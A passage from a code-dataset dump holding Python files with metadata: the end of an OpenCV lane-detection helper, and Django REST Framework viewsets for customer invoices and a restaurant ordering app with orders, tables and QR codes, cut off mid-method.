255, 255)\n if(not detected):\n fontColor = (255,0,0)\n cv2.putText(result, 'Radius of left line curvature: ' + str(left_curverad) + ' compared to '+str(left_curverad_current)+ ' m', (50, 20), font, 1, fontColor, 2, cv2.LINE_AA)\n cv2.putText(result, 'Radius of right line curvature: ' + str(right_curverad) + ' compared to '+str(right_curverad_current)+ ' m', (50, 50), font, 1, fontColor, 2,\n cv2.LINE_AA)\n cv2.putText(result, 'Vehicle position : %.2f m %s of center compared to %s' % (abs(line_base_pos), 'left' if line_base_pos < 0 else 'right', str(line_base_pos_current)), (50, 80),\n font, 1, fontColor, 2, cv2.LINE_AA)\n if(straightAway):\n cv2.putText(result, 'Straight Lanes Detected', (50, 100), font, 1, fontColor, 2, cv2.LINE_AA)\n\n return result\n\ndef get_vehicle_position(image, left_fitx, right_fitx, xm_per_pix):\n # determine vehicle position\n vehicle_pos = image.shape[1] // 2\n middle = (left_fitx[-1] + right_fitx[-1]) // 2\n line_base_pos = (vehicle_pos - middle) * xm_per_pix\n\n return line_base_pos\n\n\n", "sub_path": "Helper_Functions.py", "file_name": "Helper_Functions.py", "file_ext": "py", "file_size_in_byte": 26825, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.mgrid", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.calibrateCamera", "line_number": 37, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.undistort", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.undistort", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 75, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.drawChessboardCorners", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 94, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 98, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 100, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.absolute", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.Sobel", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.absolute", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.Sobel", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 130, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 130, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 132, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 132, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 133, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 133, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 147, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 149, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 149, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 151, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 152, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 152, "usage_type": "attribute"}, {"api_name": "numpy.arctan2", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 156, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 164, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2HLS", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 187, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 225, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 233, "usage_type": "attribute"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 238, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 271, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 293, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 336, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 337, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 359, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 372, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 375, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 375, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 376, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 378, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 378, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 379, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 379, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 380, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 380, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 381, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 381, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 382, "usage_type": "name"}, {"api_name": "numpy.dstack", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 398, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 401, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 402, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 403, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 408, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 416, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 422, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 464, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 465, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 477, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 477, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 478, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 479, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 479, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 479, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 480, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 481, "usage_type": "attribute"}, {"api_name": "cv2.addWeighted", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 486, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 486, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 486, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 493, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 505, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 507, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 516, "usage_type": "attribute"}, {"api_name": "numpy.dstack", "line_number": 517, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 522, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 525, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 525, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 528, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 530, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 531, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 531, "usage_type": "name"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 534, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 538, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 538, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 539, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 540, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 541, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 542, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 544, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 544, "usage_type": "attribute"}]}
+{"seq_id": "509688631", "text": "from rest_framework import filters, mixins, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAdminUser\nfrom sreps.api.v1.serializers.customer import CustomerSerializer\nfrom sreps.api.v1.serializers.invoice import InvoiceListSerializer\nfrom sreps.core.models import Customer, Invoice\n\n\nclass CustomerViewSet(\n mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.GenericViewSet,):\n\n queryset = Customer.objects.all()\n serializer_class = CustomerSerializer\n permission_classes = (IsAdminUser,)\n\n @action(detail=True, methods=['GET'], name='Customer invoices')\n def invoices(self, request, pk=None):\n \"\"\"Get invoices made by a customer.\"\"\"\n\n customer = get_object_or_404(self.queryset, pk=pk)\n\n invoices = Invoice.objects.filter(\n customer=customer).order_by('-datetime_created')\n serializer = InvoiceListSerializer(invoices, many=True)\n\n return Response(serializer.data)\n", "sub_path": "sreps/api/v1/views/customer.py", "file_name": "customer.py", "file_ext": "py", "file_size_in_byte": 1105, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 12, "usage_type": "name"}, {"api_name": "rest_framework.mixins.UpdateModelMixin", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.mixins.DestroyModelMixin", "line_number": 14, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 14, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 15, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 15, "usage_type": "name"}, {"api_name": "sreps.core.models.Customer.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "sreps.core.models.Customer.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sreps.core.models.Customer", "line_number": 17, "usage_type": "name"}, {"api_name": "sreps.api.v1.serializers.customer.CustomerSerializer", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 19, "usage_type": "name"}, {"api_name": "sreps.core.models.Invoice.objects.filter", "line_number": 27, "usage_type": "call"}, {"api_name": "sreps.core.models.Invoice.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "sreps.core.models.Invoice", "line_number": 27, "usage_type": "name"}, {"api_name": "sreps.api.v1.serializers.invoice.InvoiceListSerializer", "line_number": 29, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "89568133", "text": "from django.contrib.auth.hashers import check_password\nfrom rest_framework import viewsets, status, mixins\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.utils import json\nfrom django.forms.models import model_to_dict\nfrom django.db.models import ObjectDoesNotExist\nimport logging\nfrom ServeUp.Views.helper import *\n\nclass NarociloViewSet(viewsets.ModelViewSet):\n \"\"\"\n ViewSet provides 'list', 'create', 'retrieve', 'update' and 'destroy' actions\n\n Additional actions can be added using '@action()' decorator, default response\n is GET, you can add POST using 'methods' argument\n \"\"\"\n queryset = Narocilo.objects.all()\n serializer_class = NarociloSerializer\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n Returns all orders for restaurant with specified id in GET parameter 'id_restavracija'.\n\n ORDER_NEW = 0 # \"Nova Naročila\"\n ORDER_PREPARING = 1 # \"V Pripravi\"\n ORDER_DONE = 2 # \"Pripravljeno\"\n ORDER_FINISHED = 3 # \"Končano\"\n \"\"\"\n get_params = request.query_params\n response = {}\n return_data = {}\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Missing id, add ?id_restavracija=x to call\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n data = JediNarocilaPodatki.objects.filter(id_restavracija=id_restavracija,\n status__in=[ORDER_NEW, ORDER_DONE, ORDER_PREPARING, ORDER_FINISHED])\n data = JediNarocilaPodatkiSerializer(data, many=True).data\n\n for order in data:\n id_narocila = order['id_narocila']\n if id_narocila not in return_data:\n return_data[id_narocila] = {\n 'cas_prevzema': order['cas_prevzema'],\n 'cas_narocila': order['cas_narocila'],\n 'id_restavracija': order['id_restavracija'],\n 'id_uporabnik': order['id_uporabnik'],\n 'cena': 0,\n 'id_narocila': order['id_narocila'],\n 'status': order['status'],\n 'checked_in': order['checked_in'],\n 'id_miza': order['id_miza'],\n 'jedi': []\n }\n\n return_data[id_narocila]['jedi'].append({\n 'id_jed': order['id_jed'],\n 'ime_jedi': order['ime_jedi'],\n 'kolicina': order['kolicina'],\n 'cena': order['cena']\n })\n return_data[id_narocila]['cena'] += order['cena']\n\n response['status'] = 1\n response['data'] = list(return_data.values())\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['GET'])\n def refresh(self, request):\n \"\"\"\n Returns new and cancelled orders for a restaurant\n GET params:\n id_restavracija: id of the restaurant to refresh orders\n \"\"\"\n get_params = request.query_params\n response = {}\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Missing id, add ?id_restavracija=x to call\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n new, cancelled, checked_in = get_new_cancelled_checked_in_orders(int(id_restavracija))\n response['status'] = 1\n response['new_orders'] = new\n response['cancelled_orders'] = cancelled\n response['checked_in_orders'] = checked_in\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def cancel_order(self, request):\n \"\"\"\n Receive order id and delete that order from the database effectively cancelling it.\n Add the order id to the cancelled orders list\n Return conformation of action or error.\n \"\"\"\n response = {}\n data = json.load(request)\n try:\n order_id = data['id_narocilo']\n except KeyError as e:\n response['status'] = 0\n response['description'] = \"Missing key data \" + str(e) + \"\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n # noinspection PyBroadException\n try:\n narocilo = Narocilo.objects.get(id_narocila=order_id)\n order = {'id_narocila': narocilo.id_narocila, 'id_restavracija': narocilo.id_restavracija.id_restavracija}\n narocilo.delete()\n add_cancelled_order(order)\n response['status'] = 1\n response['description'] = \"Successfully deleted order\"\n return Response(response, status=status.HTTP_200_OK)\n except Exception:\n response['status'] = 0\n response['description'] = \"Could not delete order {}\".format(order_id)\n return Response(response, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n @action(detail=False, methods=['POST'])\n def new_order(self, request):\n \"\"\"\n The function receives JSON data with the details of a new order and stores it.\n Return values\n status: 0 - Error, 1 - Successfully added\n description: Short description of Error or confirm desired action\n \"\"\"\n response = {}\n data = json.load(request)\n\n try:\n order = {\n \"cas_prevzema\": data['cas_prevzema'],\n \"cas_narocila\": data['cas_narocila'],\n \"id_restavracija\": data['id_restavracija'],\n \"id_uporabnik\": data['id_uporabnik'],\n \"status\": ORDER_NEW,\n \"checked_in\": False\n }\n meals = data['jedi']\n except KeyError as e:\n response['status'] = 0\n response['description'] = \"Missing key data \" + str(e) + \"\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n if len(meals) == 0: # If there are no meals in order wrong formatting\n response['status'] = 0\n response['description'] = \"No meal data\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = NarociloSerializer(data=order)\n if serializer.is_valid():\n narocilo = serializer.save()\n id_narocila = narocilo.id_narocila\n\n success, price = add_meals_to_order(meals, id_narocila)\n if not success: # Something went wrong delete order\n narocilo.delete()\n response['status'] = 0\n response['description'] = \"Could not insert meals\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n order['cena'] = price\n order['id_narocila'] = id_narocila\n order['jedi'] = meals\n add_new_order(order)\n response['status'] = 1\n response['description'] = \"New order created\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n response['status'] = 0\n response['description'] = \"Could not add new order\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n @action(detail=False, methods=['POST'])\n def status_update(self, request):\n response = {'status': \"\",\n 'description': \"\"}\n order = Narocilo.objects.get(id_narocila=request.data['id_narocilo'])\n data = model_to_dict(order)\n data[\"status\"] = request.data[\"status\"]\n\n if not 0 <= request.data[\"status\"] <= 3:\n response['status'] = 0\n response['description'] = \"Invalid status value\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = NarociloSerializer(data=data, instance=order)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"Successfully changed status\"\n return Response(response, status=status.HTTP_200_OK)\n else:\n response['status'] = 0\n response['description'] = serializer.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass RestavracijaViewSet(viewsets.ModelViewSet):\n \"\"\"\n ViewSet provides 'list', 'create', 'retrieve', 'update' and 'destroy' actions\n\n Additional actions can be added using '@action()' decorator, default response\n is GET, you can add POST using 'methods' argument\n \"\"\"\n queryset = Restavracija.objects.all()\n serializer_class = RestavracijaSerializer\n\n @action(detail=False, methods=['POST'])\n def home(self, request):\n \"\"\"\n The function receives JSON data with the name of a city.\n Return all restaurants in given city.\n Return values\n status: 0 - Error\n description: Short description of Error or confirm desired action\n\n If valid input return only array of restaurants, request by Urban.\n \"\"\"\n response = {}\n try:\n location = request.data['location']\n except KeyError:\n location = None\n\n if location is None:\n response['status'] = 0\n response['description'] = \"Error: Please input the location\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n else:\n response = get_restaurants(location)\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def register(self, request):\n \"\"\"\n The function receives a JSON data with the admin email, restaurant name,\n restaurant type, address and rating\n Return values\n status: 0 - Error, 1 - OK\n description: Short description of Error or confirm desired action\n additional actions: Set of actions that also had to be performed, in ex. updating address table\n \"\"\"\n response = {'status': \"\",\n 'description': \"\",\n 'additional actions': \"\"}\n\n # Get admin id\n id_admin = AdminUporabnik.objects.get(email=request.data['email']).id\n\n # Deal with address id\n requested_data = request.data['naslov'].split(', ')\n address = requested_data[0].split(' ')\n post = requested_data[1].split(' ')\n\n try:\n id_address = Naslov.objects.get(ulica=\" \".join(address[:-1]), hisna_stevilka=address[-1]).id_naslov\n except Naslov.DoesNotExist:\n naslov_data = {'ulica': \" \".join(address[:-1]),\n 'hisna_stevilka': address[-1],\n 'postna_stevilka': post[0]}\n\n # Add post to Posta table, if it doesn't exist\n try:\n Posta.objects.get(postna_stevilka=post[0])\n except Posta.DoesNotExist:\n posta_data = {'postna_stevilka': post[0], 'kraj': post[1]}\n serializer_posta = PostaSerializer(data=posta_data)\n if serializer_posta.is_valid():\n serializer_posta.save()\n response['additional actions'] += \"\\nUpdated Posta table\"\n else:\n response['status'] = 0\n response['description'] = serializer_posta.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n # Add address to Naslov table, if it doesn't exist\n serializer_naslov = NaslovSerializer(data=naslov_data)\n if serializer_naslov.is_valid():\n serializer_naslov.save()\n response['additional actions'] += \"\\nUpdated Address table\"\n else:\n response['status'] = 0\n response['description'] = serializer_naslov.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n id_address = Naslov.objects.get(ulica=\" \".join(address[:-1]), hisna_stevilka=address[-1]).id_naslov\n\n # Build JSON object\n data = {'id_admin': id_admin,\n 'ime_restavracije': request.data['ime_restavracije'],\n 'id_tip_restavracije': request.data['id_tip_restavracije'],\n 'id_naslov': id_address, 'ocena': request.data['ocena']}\n\n serializer = RestavracijaSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"Restaurant added to admin\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n response['status'] = 0\n response['description'] = serializer.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n @action(detail=False, methods=['GET'])\n def fetch_qr(self, request):\n \"\"\"\n Function receives id_restavracija parameter\n Returns all QR codes for a given id_restavracija\n Return values:\n status: 0 || 1\n data: JSON array with QR codes\n \"\"\"\n\n get_params = request.query_params\n response = {}\n return_data = []\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Missing id, add ?id_restavracija=x to call\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n data = Mize.objects.filter(id_restavracija=id_restavracija)\n data = MizeSerializer(data, many=True).data\n\n for obj in data:\n id_miza = obj['id_miza']\n if id_miza not in return_data:\n return_data.append(id_miza)\n\n response['status'] = 1\n response['data'] = return_data\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def add_table(self, request):\n response = {}\n data = request.data\n\n try:\n id_restavracija = data['id_restavracija']\n qr = data['qr']\n except KeyError as e:\n response['status'] = 0\n response['description'] = \"Missing key data \" + str(e) + \"\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n if not len(qr):\n response['status'] = 0\n response['description'] = \"Missing data\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n table = {\n 'id_restavracija': id_restavracija,\n 'id_miza': qr\n }\n\n serializer = MizeSerializer(data=table)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"Successfully added table to restaurant\"\n return Response(response, 